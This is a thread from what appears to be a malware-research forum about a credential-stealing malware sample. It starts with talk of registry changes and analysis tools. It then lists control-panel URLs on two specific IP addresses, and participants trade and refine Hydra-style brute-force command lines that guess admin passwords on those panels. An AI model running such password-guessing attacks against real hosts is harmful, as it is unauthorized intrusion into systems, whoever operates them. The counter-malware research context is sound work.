[rinn]

I'll have it remember for the next time, how about the other registry blob who shot the desktop info,
was it coming from process monitor too? I must dig more about this tool..In the mean time I revoke analysis related to the related point mentioned.

rgds

Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11

Best Regards,
-rin

[unixfreaxjp]

Hi.

It is from Explorer. This is desktop icon arrangement settings. I see you have ProcMon, Process Explorer, RegShot, OllyDbg, Wireshark, CaptureBat, HiJackThis.

http://answers.microsoft.com/en-us/wind ... 72a07e2c11
Best Regards,
-rin

Awesome! Bless you for pointing me the correct path. I guess I'm a full-time learner for sure.
Just check it here and there, to find that the usual registry changes (autorun, configs + some little here & there) was the stealer actually did. No changes in registry. I revoke all of my statement accordingly.

[Xylitol]

panel locs, web stuff

Code: Select all

85.143.166.141/mx/1A/panel/
62.76.177.123/mx/5/E/panel/
62.76.177.123/mx/5/B/panel/
62.76.177.123/mx/5/A/panel/
62.76.177.123/mx/6/E/panel/
62.76.177.123/mx/6/B/panel/
62.76.177.123/mx/6/A/panel/
62.76.177.123/mx/3A/panel/
85.143.166.141/mx/3A/panel/
62.76.177.123/if_Career/admin.php
85.143.166.141/mx/3A/panel/tpl/theme1/res/
85.143.166.141/mx/3A/panel/events.php
85.143.166.141/mx/3A/panel/header.php
85.143.166.141/mx/3A/panel/users.php
85.143.166.141/mx/3A/panel/reports.php
85.143.166.141/mx/3A/panel/report.php
85.143.166.141/mx/3A/panel/cp.php
85.143.166.141/mx/3A/panel/footer.php
85.143.166.141/mx/3A/panel/config.php
85.143.166.141/mx/3A/panel/settings.php
85.143.166.141/mx/3A/panel/socks.php
85.143.166.141/mx/3A/panel/commands.php
---
85.143.166.141/info.php
85.143.166.141/check.php
85.143.166.141/mx/3A/in/include/
85.143.166.141/mx/3A/in/cp.php
85.143.166.141/mx/3A/in/config.php
85.143.166.141/mx/3A/in/cp8.php

[unixfreaxjp]

panel locs, web stuff

Yep! You're a magician allright. )
Gratitude friend!

[unixfreaxjp]

use:

Code: Select all

-l admin -P pwd.lst -s 80 -w 64 -f -V 85.143.166.141 http-post-form "/mx/3A/panel/events.php:login&username=admin&password=^PASS^:Bad user name or password."

works.

[Xylitol]

nah, will not work

Code: Select all

-l admin -P pwd.lst -s 80 -w 64 -f -V 85.143.166.141 http-post-form "/mx/3A/panel/events.php:username=admin&password=^PASS^:Login"

should be ok.

[unixfreaxjp]

the other one:

Code: Select all

-l admin -P pwd.lst -s 80 -w 64 -f -V 62.76.177.123 http-post-form "/if_Career/admin.php:&pass=^PASS^:Bad user name or password." 

[unixfreaxjp]

nah, will not work

Thank you for replying and advice, but pls look at this:

attached pwd.lst I used.

[unixfreaxjp]

should be ok.

I revoked my commands for the 85.143.166.141, yes Xylit0l ones worked better!
snipped:

One more thing, bad news: all of the pwd.lst rejected..
As per suspect they encrypt the pwds now.. (banging head to the wall)
love to get the screenshot for evidence, any helps?

[unixfreaxjp]

Tried all previous cases' password. all of them are failed. latest one is attached.
Guess we must start decrypt it properly.. ok, good, start now..